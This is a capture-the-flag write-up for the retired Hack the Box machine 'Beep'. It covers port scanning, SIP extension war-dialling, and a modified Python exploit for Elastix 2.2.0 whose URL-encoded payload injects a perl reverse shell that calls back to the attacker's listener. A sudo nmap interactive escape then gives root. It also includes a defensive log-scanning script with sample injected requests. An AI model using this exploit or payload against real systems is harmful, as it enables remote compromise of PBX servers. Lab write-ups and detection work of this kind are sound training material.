Hack the Box Writeup - Beep

My writeup of how to compromise the retired Hack the Box machine, Beep.

Note: You can find my previous guide to Shocker here.

Enumeration

As always we start with our initial enumeration.

$ nmap -sC -sV -p- -oA nmap/initial 10.10.10.7

Lots of ports are open on this box, including SSH, HTTP and HTTPS, SMTP and POP3.

Browsing to port 80 redirects us straight to 443 and shows us a login page for Elastix, which is a VoIP PBX system.

A quick search on Exploit DB shows that there is a remote code execution vulnerability for Elastix 2.2.0, so let's give that a whirl.

Exploitation

https://www.exploit-db.com/exploits/18650/

We download the script from exploit-db and take a closer look at it. We need to edit it slightly to put in the target's IP and our own IP, along with the port we are going to be listening on. Start up netcat and then run the script ...

[Screenshot: ssl_error]

Uh oh. We get an SSL error. We need to modify the python code a little to make it ignore certificate errors. We can change the script over to the following:

# Python 2 script: urllib.urlopen() only accepts the context= argument from 2.7.9 onwards.
import urllib
import ssl

rhost="10.10.10.7"     # target
lhost="10.10.14.15"    # our listener address
lport=443              # our listener port
extension="1000"       # SIP extension the call is placed to

# Disable certificate verification so the self-signed cert does not abort the request
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
# Reverse shell payload

url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urllib.urlopen(url, context=ctx)

OK, now the script runs without any errors but we don't get a shell back. The likelihood is that the phone extension the script is looking for doesn't exist.

So we need to use another tool to locate a valid SIP extension: SIPVicious. We use its war-dialling tool, svwar.

$ svwar -m INVITE -e100-300 10.10.10.7

[Screenshot: sip_vicious]

So now we can modify our script again and change the extension over to 233. Running it now gives us our shell, and access to the first flag.

[Screenshot: shell-2]
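From the defender's side, the request used above leaves a distinctive trace in the web server's access log: a hit on callme_page.php whose callmenum parameter carries URL-encoded CRLFs (%0D%0A) followed by Asterisk call-file directives. The following Python 3 script is an added example, not part of the original writeup or of the exploit, that scans Apache combined-format log lines for that pattern; the three sample lines and their timestamps are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit, unquote

# Apache combined-log-format line (the sample lines further down are constructed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
CALLME_PATH = "/recordings/misc/callme_page.php"
# An Asterisk call-file directive has no business arriving inside a URL parameter.
DIRECTIVE_RE = re.compile(r"application:\s*system", re.I)

def inspect_request(line):
    """Return a finding dict for one access-log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None                                   # not a parsable request line
    parts = urlsplit(m.group("target"))
    decoded = unquote(parts.query)                    # %0D%0A -> "\r\n"
    indicators = []
    if "\r" in decoded or "\n" in decoded:
        indicators.append("crlf_in_query")            # line breaks smuggled into a parameter
    if DIRECTIVE_RE.search(decoded):
        indicators.append("call_file_directive")      # Application: system in callmenum
    if not indicators:
        return None                                   # a plain "call me" request is legitimate use
    if parts.path == CALLME_PATH:
        indicators.append("callme_endpoint")          # the endpoint targeted by EDB 18650
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": parts.path,
            "status": m.group("status"), "indicators": indicators}

def scan_log(text):
    """Run inspect_request over every line of a log and keep only the hits."""
    return [f for f in (inspect_request(l) for l in text.splitlines()) if f]

# Constructed sample: one injected request, one normal "call me" request, one unrelated hit.
SAMPLE_LOG = """\
10.10.14.15 - - [10/Mar/2018:12:00:01 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20id%0D%0A%0D%0A HTTP/1.1" 200 1024
10.10.14.20 - - [10/Mar/2018:12:00:02 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=233 HTTP/1.1" 200 1024
10.10.14.21 - - [10/Mar/2018:12:00:03 +0000] "GET /index.php HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Only the first sample line is reported; the second, an ordinary use of the "call me" feature, is deliberately left alone so the rule does not fire on every call placed through the PBX.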

Privilege Escalation

Reading the comments at the bottom of the exploit also tells us an incredibly easy way to get root. Simply enter the following into your shell.

> sudo nmap --interactive
> !sh

[Screenshot: root_shell]

And done; a root shell and access to the final flag.

There are at least 3 other ways of getting shells on this box. I leave it to you as an exercise to find them.